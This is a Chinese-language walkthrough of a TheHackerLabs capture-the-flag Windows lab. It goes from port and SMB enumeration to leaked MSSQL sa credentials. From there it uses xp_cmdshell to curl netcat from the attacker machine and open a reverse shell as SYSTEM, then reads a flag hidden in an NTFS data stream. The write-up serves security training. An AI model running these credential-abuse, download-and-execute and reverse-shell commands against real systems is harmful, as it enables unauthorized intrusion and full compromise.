TheHackerLabs Accounting Walkthrough

靶机地址:https://thehackerslabs.com/accounting/
第一次玩TheHackerLabs的靶机,还是先继续win系统的。
Tips: mssql基本操作、NTFS数据流

扫描一下端口,发现开着smb和9081的http,以及一个mssql端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
PORT      STATE SERVICE       VERSION                                                                                                                                         
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                           
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                   
445/tcp   open  microsoft-ds?                                                                                                                                                 
1801/tcp  open  msmq?                                                                                                                                                         
2103/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                           
2105/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                           
2107/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                           
5040/tcp  open  unknown                                                                                                                                                       
9047/tcp  open  unknown                                                                                                                                                       
9079/tcp  open  unknown                                                                                                                                                       
9080/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                         
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                   
|_http-title: Not Found
9081/tcp  open  http          Microsoft Cassini httpd 4.0.1.6 (ASP.NET 4.0.30319)
| http-title: Login Saci
|_Requested resource was /App/Login.aspx
|_http-server-header: Cassini/4.0.1.6
9083/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found
9147/tcp  open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
49992/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   192.168.56.136\COMPAC: 
|     Target_Name: DESKTOP-M464J3M
|     NetBIOS_Domain_Name: DESKTOP-M464J3M
|     NetBIOS_Computer_Name: DESKTOP-M464J3M
|     DNS_Domain_Name: DESKTOP-M464J3M
|     DNS_Computer_Name: DESKTOP-M464J3M
|_    Product_Version: 10.0.19041
| ms-sql-info: 
|   192.168.56.136\COMPAC: 
|     Instance name: COMPAC
|     Version: 
|       name: Microsoft SQL Server 2017 RTM 
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 49992
|_    Clustered: false
|_ssl-date: 2024-11-08T19:22:50+00:00; +15h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-08T19:12:10
|_Not valid after:  2054-11-08T19:12:10
MAC Address: 08:00:27:B5:DE:27 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

先利用netexec找出用户名。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB         192.168.56.136  445    DESKTOP-M464J3M  [*] Windows 10 / Server 2019 Build 19041 x64 (name:DESKTOP-M464J3M) (domain:DESKTOP-M464J3M) (signing:False) (SMBv1:False)
SMB         192.168.56.136  445    DESKTOP-M464J3M  [+] DESKTOP-M464J3M\anonymous: (Guest)
SMB         192.168.56.136  445    DESKTOP-M464J3M  500: DESKTOP-M464J3M\Administrador (SidTypeUser)
SMB         192.168.56.136  445    DESKTOP-M464J3M  501: DESKTOP-M464J3M\Invitado (SidTypeUser)
SMB         192.168.56.136  445    DESKTOP-M464J3M  503: DESKTOP-M464J3M\DefaultAccount (SidTypeUser)
SMB         192.168.56.136  445    DESKTOP-M464J3M  504: DESKTOP-M464J3M\WDAGUtilityAccount (SidTypeUser)
SMB         192.168.56.136  445    DESKTOP-M464J3M  513: DESKTOP-M464J3M\Ninguno (SidTypeGroup)
SMB         192.168.56.136  445    DESKTOP-M464J3M  1001: DESKTOP-M464J3M\contpaqi (SidTypeUser)
SMB         192.168.56.136  445    DESKTOP-M464J3M  1002: DESKTOP-M464J3M\SQLServer2005SQLBrowserUser$DESKTOP-M464J3M (SidTypeAlias)
SMB         192.168.56.136  445    DESKTOP-M464J3M  1003: DESKTOP-M464J3M\admin (SidTypeUser)

以空目录查看smb,发现Compac目录可读。

└─$ crackmapexec smb $IP -u 'null' -p '' --shares                                          
SMB         192.168.56.136  445    DESKTOP-M464J3M  [*] Windows 10 / Server 2019 Build 19041 x64 (name:DESKTOP-M464J3M) (domain:DESKTOP-M464J3M) (signing:False) (SMBv1:False)
SMB         192.168.56.136  445    DESKTOP-M464J3M  [+] DESKTOP-M464J3M\null: 
SMB         192.168.56.136  445    DESKTOP-M464J3M  [+] Enumerated shares
SMB         192.168.56.136  445    DESKTOP-M464J3M  Share           Permissions     Remark
SMB         192.168.56.136  445    DESKTOP-M464J3M  -----           -----------     ------
SMB         192.168.56.136  445    DESKTOP-M464J3M  ADMIN$                          Admin remota
SMB         192.168.56.136  445    DESKTOP-M464J3M  C$                              Recurso predeterminado
SMB         192.168.56.136  445    DESKTOP-M464J3M  Compac          READ,WRITE      
SMB         192.168.56.136  445    DESKTOP-M464J3M  IPC$            READ            IPC remota
SMB         192.168.56.136  445    DESKTOP-M464J3M  Users           READ

以空账户或者任意用户名登录smb,循环把所有文件下载下来。

└─$ smbclient -N //$IP/Compac      
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov  9 04:51:38 2024
  ..                                  D        0  Sat Nov  9 04:51:38 2024
  Empresas                            D        0  Sat May 11 10:49:15 2024
  Index                               D        0  Sat Nov  9 04:03:09 2024

                5113953 blocks of size 4096. 961603 blocks available
smb: \> recurse on                                                                                                                                                            
smb: \> prompt off                                                                                                                                                            
smb: \> mget *

下面有两条路,一条是9081端口开的http服务还没有检索,扫描一下目录。

└─$ cat 9081.log                                 
/images               (Status: 302) [Size: 125] [--> /images/]
/download             (Status: 302) [Size: 127] [--> /download/]
/img                  (Status: 302) [Size: 122] [--> /img/]
/default.aspx         (Status: 302) [Size: 132] [--> /App/Login.aspx]
/docs                 (Status: 302) [Size: 123] [--> /docs/]
/Images               (Status: 302) [Size: 125] [--> /Images/]
/Default.aspx         (Status: 302) [Size: 132] [--> /App/Login.aspx]
/scripts              (Status: 302) [Size: 126] [--> /scripts/]
/add                  (Status: 302) [Size: 122] [--> /add/]
/css                  (Status: 302) [Size: 122] [--> /css/]
/Download             (Status: 302) [Size: 127] [--> /Download/]
/app                  (Status: 302) [Size: 122] [--> /app/]
/Docs                 (Status: 302) [Size: 123] [--> /Docs/]

在Download目录下发现

└─$ curl http://192.168.56.136:9081/download/notas.txt
supervisor
supervisor

浏览下载后的文件,在Download目录下发现notas.txt,里面有个用户名和密码。

└─$ curl http://192.168.56.136:9081/download/notas.txt
supervisor
superviso

使用这个密码可以登录9081的APP,但无法找到利用漏洞。

└─$ searchsploit contpaq  
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path                                                                                         | windows/local/50690.txt
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

回到第二条路,从本地下载smb的文件里找敏感信息,找到另一个用户名密码。

└─$ cat Empresas/SQL.txt 
SQL 2017 
Instancia COMPAC 
sa 
Contpaqi2023.

ip
127.0.0.1

Tip para terminar instalaciones
1) Ejecutar seguridad de icono
Sobre el icono asegurarse que diga ejecutar como Administrador.

2) Ejecutar el comando regedit...
Buscar la llave Hkey Local Machine, luego Software, luego Wow32, Computacion en Accion...(abri pantalla con boton del lado derecho
donde dice seguridad y ver que aparezca "everyone" y darle control total

尝试使用mssqlclient登录mssql的49992端口。

└─$ mssqlclient.py -p 49992 sa:'Contpaqi2023.'@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DESKTOP-M464J3M\COMPAC): Line 1: Changed database context to 'master'.
[*] INFO(DESKTOP-M464J3M\COMPAC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> 

这个系统可以执行xp_cmdshell,先看一下权限和当前目录。

SQL (sa  dbo@master)> xp_cmdshell cd
output                
-------------------   
C:\Windows\system32   

NULL                  

SQL (sa  dbo@master)> xp_cmdshell whoami
output                
-------------------   
nt authority\system

下面就是上传shell了。我使用msfvenom制作的shell上传后运行总是出错,只能使用nc,但要注意版本兼容性。不兼容的nc运行后错误如下:

SQL (sa  dbo@master)> xp_cmdshell "\\192.168.56.101\kali\nc64.exe 192.168.56.101 1234 -e cmd"
output                                                                             
--------------------------------------------------------------------------------   
Esta versión de \\192.168.56.101\kali\nc64.exe no es compatible con la versión de Windows que está ejecutando. Compruebe la información de sistema del equipo y después póngase en contacto con el anunciante de software.

兼容win10的nc地址:https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip

我们将nc64.exe下载到本机,在本机建立http服务,靶机下载成功(这里也可用impacket-smbserver建立 smb服务器)。

SQL (sa  dbo@master)> xp_cmdshell "curl -O http://192.168.56.101/nc64.exe"
output                                                                             
--------------------------------------------------------------------------------   
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current    

                                 Dload  Upload   Total   Spent    Left  Speed      

100 45272  100 45272    0     0  3486k      0 --:--:-- --:--:-- --:--:-- 3684k   

靶机运行上传的nc。

SQL (sa  dbo@master)> xp_cmdshell "nc64.exe 192.168.56.101 1234 -e cmd"

本机监听后可以得到shell。查看权限,是系统权限。

└─$ nc -nlvp 1234                                                                                                                                                             
listening on [any] 1234 ...                                                                                                                                                   
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.136] 49746                                                                                                             
Microsoft Windows [Versin 10.0.19045.2965]                                                                                                                                    
(c) Microsoft Corporation. Todos los derechos reservados.
C:\>whoami /priv
whoami /priv
Nombre de privilegio                      Descripcin                                                         Estado       
========================================= =================================================================== =============
SeAssignPrimaryTokenPrivilege             Reemplazar un smbolo (token) de nivel de proceso                   Deshabilitado
SeLockMemoryPrivilege                     Bloquear pginas en la memoria                                      Habilitada   
SeIncreaseQuotaPrivilege                  Ajustar las cuotas de la memoria para un proceso                    Deshabilitado
SeTcbPrivilege                            Actuar como parte del sistema operativo                             Habilitada   
SeSecurityPrivilege                       Administrar registro de seguridad y auditora                       Deshabilitado
SeTakeOwnershipPrivilege                  Tomar posesin de archivos y otros objetos                          Deshabilitado
SeLoadDriverPrivilege                     Cargar y descargar controladores de dispositivo                     Deshabilitado
SeSystemProfilePrivilege                  Generar perfiles del rendimiento del sistema                        Habilitada   
SeSystemtimePrivilege                     Cambiar la hora del sistema                                         Deshabilitado
SeProfileSingleProcessPrivilege           Generar perfiles de un solo proceso                                 Habilitada   
SeIncreaseBasePriorityPrivilege           Aumentar prioridad de programacin                                  Habilitada   
SeCreatePagefilePrivilege                 Crear un archivo de paginacin                                      Habilitada   
SeCreatePermanentPrivilege                Crear objetos compartidos permanentes                               Habilitada   
SeBackupPrivilege                         Hacer copias de seguridad de archivos y directorios                 Deshabilitado
SeRestorePrivilege                        Restaurar archivos y directorios                                    Deshabilitado
SeShutdownPrivilege                       Apagar el sistema                                                   Deshabilitado
SeDebugPrivilege                          Depurar programas                                                   Habilitada   
SeAuditPrivilege                          Generar auditoras de seguridad                                     Habilitada   
SeSystemEnvironmentPrivilege              Modificar valores de entorno firmware                               Deshabilitado
SeChangeNotifyPrivilege                   Omitir comprobacin de recorrido                                    Habilitada   
SeUndockPrivilege                         Quitar equipo de la estacin de acoplamiento                        Deshabilitado
SeManageVolumePrivilege                   Realizar tareas de mantenimiento del volumen                        Habilitada   
SeImpersonatePrivilege                    Suplantar a un cliente tras la autenticacin                        Habilitada   
SeCreateGlobalPrivilege                   Crear objetos globales                                              Habilitada   
SeIncreaseWorkingSetPrivilege             Aumentar el espacio de trabajo de un proceso                        Habilitada   
SeTimeZonePrivilege                       Cambiar la zona horaria                                             Habilitada   
SeCreateSymbolicLinkPrivilege             Crear vnculos simblicos                                           Habilitada   
SeDelegateSessionUserImpersonatePrivilege Obtn un token de suplantacin para otro usuario en la misma sesin Habilitada

使用这个用户,可以很方便拿到user flag,但在显示root flag时,发现了图案,应该是root flag被隐藏了。

C:\Users\admin\Desktop>type root.txt                                                                                                                                          
type root.txt                                                                                                                                                                 
                      ____...                                                                                                                                                 
             .-"--"""".__    `.                                                                                                                                               
            |            `    |                                                                                                                                               
  (         `._....------.._.:                                                                                                                                                
   )         .()''        ``().                                                                                                                                               
  '          () .=='  `===  `-.                                                                                                                                               
   . )       (         g)                                                                                                                                                     
    )         )     /        J                                                                                                                                                
   (          |.   /      . (                                                                                                                                                 
   $$         (.  (_'.   , )|`                                                                                                                                                
   ||         |\`-....--'/  ' \                                                                                                                                               
  /||.         \\ | | | /  /   \.                                                                                                                                             
 //||(\         \`-===-'  '     \o.                                                                                                                                           
.//7' |)         `. --   / (     OObaaaad888b.                                                                                                                                
(<<. / |     .a888b`.__.'d\     OO888888888888a.                                                                                                                              
 \  Y' |    .8888888aaaa88POOOOOO888888888888888.                                                                                                                             
  \  \ |   .888888888888888888888888888888888888b                                                                                                                             
   |   |  .d88888P88888888888888888888888b8888888.                                                                                                                            
   b.--d .d88888P8888888888888888a:f888888|888888b                                                                                                                            
   88888b 888888|8888888888888888888888888\8888888 

查看NTFS数据流,得到root flag。

C:\Users\admin\Desktop>dir /r
dir /r
 El volumen de la unidad C no tiene etiqueta.
 El nmero de serie del volumen es: A622-5802

 Directorio de C:\Users\admin\Desktop

05/10/2024  07:12 PM    <DIR>          .
05/10/2024  07:12 PM    <DIR>          ..
05/10/2024  07:05 PM             1,192 root.txt
                                    35 root.txt:HI:$DATA

C:\Users\admin\Desktop>more < root.txt:HI:$DATA
more < root.txt:HI:$DATA

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注